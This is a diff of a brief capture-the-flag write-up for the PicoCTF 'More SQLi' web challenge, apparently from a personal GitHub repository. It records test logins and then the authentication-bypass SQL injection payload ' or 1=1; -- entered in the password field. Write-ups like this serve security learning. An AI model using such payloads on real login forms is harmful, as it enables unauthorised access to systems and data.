nhattanhh/CTF/WEB/PicoCTF/MoreSQLi.md

   ![image](https://github.com/nhattanhh/CTF/assets/130430279/263162c9-f183-4469-a2a9-a2a029a4e952)

+  -try
-  try username: user
+  +username: user
-      password: user
+  +password: user

   You will received this:
   ![image](https://github.com/nhattanhh/CTF/assets/130430279/a2908bbb-16e5-484f-82fb-a92a5990bb6b)

-  try SQLinjection with password because here we can see they received password first.
+  -try SQLinjection with password because here we can see they receive password first.
-  username: 1
+  +username: 1
-  password: ' or 1=1; --
+  +password: ' or 1=1; --

   ![image](https://github.com/nhattanhh/CTF/assets/130430279/2e6a269a-5576-4f43-88e1-284b80b0984e)